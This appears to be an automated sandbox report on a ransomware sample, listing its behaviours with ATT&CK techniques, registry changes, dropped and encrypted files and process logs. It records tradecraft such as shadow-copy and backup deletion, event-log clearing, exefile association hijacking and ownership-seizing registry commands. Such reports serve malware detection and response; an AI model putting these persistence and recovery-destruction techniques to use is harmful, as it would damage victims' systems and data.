b3c495a36fea5be7069701fc373d83739aa721b87aac18c3abc390d836500047

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	[email protected]

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

Change Default File Association

T1042

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\E27E20AC.exe\" \"%L\""	[email protected]

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs

ransomware evasion

Inhibit System Recovery

pid	Process
116	bcdedit.exe
5096	bcdedit.exe
1132	bcdedit.exe
820	bcdedit.exe
1232	bcdedit.exe
384	bcdedit.exe

Deletes backup catalog 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

pid	Process
4736	wbadmin.exe
2144	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Executes dropped EXE 2 IoCs

pid	Process
2340	[email protected]
4724	BackupXXXE27E20AC.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\EditStart.tiff	[email protected]

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	sample.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	[email protected]
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	BackupXXXE27E20AC.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[email protected]	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[[email protected]][E27E20AC]desktop.ini.EAF	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#FILES-ENCRYPTED.txt	[email protected]

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Videos\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Music\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Documents\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Documents\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	[email protected]
File opened for modification	C:\Program Files\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Searches\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Links\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Videos\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Desktop\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Pictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Music\desktop.ini	[email protected]
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3751123196-3323558407-1869646069-1000\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	[email protected]

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	icanhazip.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\Wallpaper	[email protected]

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\[[email protected]][E27E20AC]org-netbeans-modules-profiler-heapwalker_ja.jar.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jfxmedia.dll	[email protected]
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\[[email protected]][E27E20AC]89.0.4389.114.manifest.EAF	[email protected]
File opened for modification	C:\Program Files\Internet Explorer\en-US\iexplore.exe.mui	[email protected]
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	[email protected]
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\[[email protected]][E27E20AC]api-ms-win-crt-locale-l1-1-0.dll.EAF	[email protected]
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ja-JP\tabskb.dll.mui	[email protected]
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ko.pak	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\lcms.dll	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\[[email protected]][E27E20AC]feature.xml.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\[[email protected]][E27E20AC]org.eclipse.equinox.p2.metadata.repository.prefs.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\[[email protected]][E27E20AC]org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\[[email protected]][E27E20AC]org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml	[email protected]
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jp2iexp.dll	[email protected]
File created	C:\Program Files\Java\jre1.8.0_66\lib\deploy\[[email protected]][E27E20AC]messages_ko.properties.EAF	[email protected]
File created	C:\Program Files\7-Zip\Lang\[[email protected]][E27E20AC]es.txt.EAF	[email protected]
File created	C:\Program Files\Common Files\System\msadc\it-IT\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\LICENSE	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\jre\[[email protected]][E27E20AC]README.txt.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\[[email protected]][E27E20AC]org-netbeans-modules-autoupdate-services_zh_CN.jar.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\[[email protected]][E27E20AC]org-netbeans-modules-queries_ja.jar.EAF	[email protected]
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R32.dll	[email protected]
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsfin.xml	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\[[email protected]][E27E20AC]org.eclipse.jface_3.10.1.v20140813-1009.jar.EAF	[email protected]
File opened for modification	C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\[[email protected]][E27E20AC]org-netbeans-modules-print.xml_hidden.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Microsoft Office\root\Client\C2R32.dll	[email protected]
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ms.pak	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\[[email protected]][E27E20AC]org-netbeans-modules-print.xml.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\[[email protected]][E27E20AC]org-netbeans-modules-progress-ui.xml.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\management.dll	[email protected]
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\flavormap.properties	[email protected]
File created	C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Java\jre1.8.0_66\lib\security\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Microsoft Office\root\Integration\[[email protected]][E27E20AC]C2RManifest.dcfmui.msi.16.en-us.xml.EAF	[email protected]
File opened for modification	C:\Program Files\7-Zip\Lang\en.ttt	[email protected]
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ClientEventLogMessages.man	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties	[email protected]
File created	C:\Program Files\Java\jre1.8.0_66\bin\[[email protected]][E27E20AC]dt_socket.dll.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbynet.jar	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\[[email protected]][E27E20AC]feature.properties.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar	[email protected]
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\[[email protected]][E27E20AC]Office 2007 - 2010.xml.EAF	[email protected]
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial Black-Arial.xml	[email protected]
File created	C:\Program Files\7-Zip\Lang\[[email protected]][E27E20AC]mng2.txt.EAF	[email protected]
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\es-ES\TipTsf.dll.mui	[email protected]
File opened for modification	C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui	[email protected]

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\BackupXXXE27E20AC.exe	[email protected]
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File created	C:\Windows\E27E20AC.bat	[email protected]
File created	C:\Windows\E27E20AC.ico	[email protected]
File created	C:\Windows\E27E20AC.exe	[email protected]

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

File Deletion

T1107

Inhibit System Recovery

pid	Process
4820	vssadmin.exe
1200	vssadmin.exe

Modifies registry class 27 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Take Ownership"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\ = "Take Ownership"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open\command	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open\command\ = "\"C:\\Windows\\E27E20AC.exe\" \"%L\""	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\E27E20AC.exe\" \"%L\""	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF	[email protected]
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	BackupXXXE27E20AC.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\ = "EAF File"	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\DefaultIcon\ = "C:\\Windows\\E27E20AC.ico"	[email protected]
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\DefaultIcon	[email protected]

Runs net.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4372	PING.EXE
4968	PING.EXE
1796	PING.EXE

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
3416	sample.exe
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]
2340	[email protected]

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3416	sample.exe
Token: SeDebugPrivilege	2340	[email protected]
Token: SeBackupPrivilege	5068	wbengine.exe
Token: SeRestorePrivilege	5068	wbengine.exe
Token: SeSecurityPrivilege	5068	wbengine.exe
Token: SeBackupPrivilege	2224	vssvc.exe
Token: SeRestorePrivilege	2224	vssvc.exe
Token: SeAuditPrivilege	2224	vssvc.exe
Token: SeIncreaseQuotaPrivilege	720	WMIC.exe
Token: SeSecurityPrivilege	720	WMIC.exe
Token: SeTakeOwnershipPrivilege	720	WMIC.exe
Token: SeLoadDriverPrivilege	720	WMIC.exe
Token: SeSystemProfilePrivilege	720	WMIC.exe
Token: SeSystemtimePrivilege	720	WMIC.exe
Token: SeProfSingleProcessPrivilege	720	WMIC.exe
Token: SeIncBasePriorityPrivilege	720	WMIC.exe
Token: SeCreatePagefilePrivilege	720	WMIC.exe
Token: SeBackupPrivilege	720	WMIC.exe
Token: SeRestorePrivilege	720	WMIC.exe
Token: SeShutdownPrivilege	720	WMIC.exe
Token: SeDebugPrivilege	720	WMIC.exe
Token: SeSystemEnvironmentPrivilege	720	WMIC.exe
Token: SeRemoteShutdownPrivilege	720	WMIC.exe
Token: SeUndockPrivilege	720	WMIC.exe
Token: SeManageVolumePrivilege	720	WMIC.exe
Token: 33	720	WMIC.exe
Token: 34	720	WMIC.exe
Token: 35	720	WMIC.exe
Token: 36	720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	720	WMIC.exe
Token: SeSecurityPrivilege	720	WMIC.exe
Token: SeTakeOwnershipPrivilege	720	WMIC.exe
Token: SeLoadDriverPrivilege	720	WMIC.exe
Token: SeSystemProfilePrivilege	720	WMIC.exe
Token: SeSystemtimePrivilege	720	WMIC.exe
Token: SeProfSingleProcessPrivilege	720	WMIC.exe
Token: SeIncBasePriorityPrivilege	720	WMIC.exe
Token: SeCreatePagefilePrivilege	720	WMIC.exe
Token: SeBackupPrivilege	720	WMIC.exe
Token: SeRestorePrivilege	720	WMIC.exe
Token: SeShutdownPrivilege	720	WMIC.exe
Token: SeDebugPrivilege	720	WMIC.exe
Token: SeSystemEnvironmentPrivilege	720	WMIC.exe
Token: SeRemoteShutdownPrivilege	720	WMIC.exe
Token: SeUndockPrivilege	720	WMIC.exe
Token: SeManageVolumePrivilege	720	WMIC.exe
Token: 33	720	WMIC.exe
Token: 34	720	WMIC.exe
Token: 35	720	WMIC.exe
Token: 36	720	WMIC.exe
Token: SeSecurityPrivilege	3196	wevtutil.exe
Token: SeBackupPrivilege	3196	wevtutil.exe
Token: SeSecurityPrivilege	1920	wevtutil.exe
Token: SeBackupPrivilege	1920	wevtutil.exe
Token: SeSecurityPrivilege	3000	wevtutil.exe
Token: SeBackupPrivilege	3000	wevtutil.exe
Token: SeSecurityPrivilege	2620	wevtutil.exe
Token: SeBackupPrivilege	2620	wevtutil.exe
Token: SeSecurityPrivilege	2628	wevtutil.exe
Token: SeBackupPrivilege	2628	wevtutil.exe
Token: SeSecurityPrivilege	3108	wevtutil.exe
Token: SeBackupPrivilege	3108	wevtutil.exe
Token: SeSecurityPrivilege	3040	wevtutil.exe
Token: SeBackupPrivilege	3040	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3416 wrote to memory of 2340	3416	sample.exe	82
PID 3416 wrote to memory of 2340	3416	sample.exe	82
PID 2340 wrote to memory of 4120	2340	[email protected]	84
PID 2340 wrote to memory of 4120	2340	[email protected]	84
PID 4120 wrote to memory of 4700	4120	cmd.exe	86
PID 4120 wrote to memory of 4700	4120	cmd.exe	86
PID 2340 wrote to memory of 4572	2340	[email protected]	89
PID 2340 wrote to memory of 4572	2340	[email protected]	89
PID 4572 wrote to memory of 4736	4572	cmd.exe	92
PID 4572 wrote to memory of 4736	4572	cmd.exe	92
PID 2340 wrote to memory of 1644	2340	[email protected]	96
PID 2340 wrote to memory of 1644	2340	[email protected]	96
PID 1644 wrote to memory of 116	1644	cmd.exe	98
PID 1644 wrote to memory of 116	1644	cmd.exe	98
PID 1644 wrote to memory of 5096	1644	cmd.exe	99
PID 1644 wrote to memory of 5096	1644	cmd.exe	99
PID 2340 wrote to memory of 4108	2340	[email protected]	100
PID 2340 wrote to memory of 4108	2340	[email protected]	100
PID 4108 wrote to memory of 1200	4108	cmd.exe	102
PID 4108 wrote to memory of 1200	4108	cmd.exe	102
PID 4108 wrote to memory of 720	4108	cmd.exe	105
PID 4108 wrote to memory of 720	4108	cmd.exe	105
PID 2340 wrote to memory of 2736	2340	[email protected]	106
PID 2340 wrote to memory of 2736	2340	[email protected]	106
PID 2736 wrote to memory of 1132	2736	cmd.exe	108
PID 2736 wrote to memory of 1132	2736	cmd.exe	108
PID 2340 wrote to memory of 4428	2340	[email protected]	109
PID 2340 wrote to memory of 4428	2340	[email protected]	109
PID 4428 wrote to memory of 820	4428	cmd.exe	111
PID 4428 wrote to memory of 820	4428	cmd.exe	111
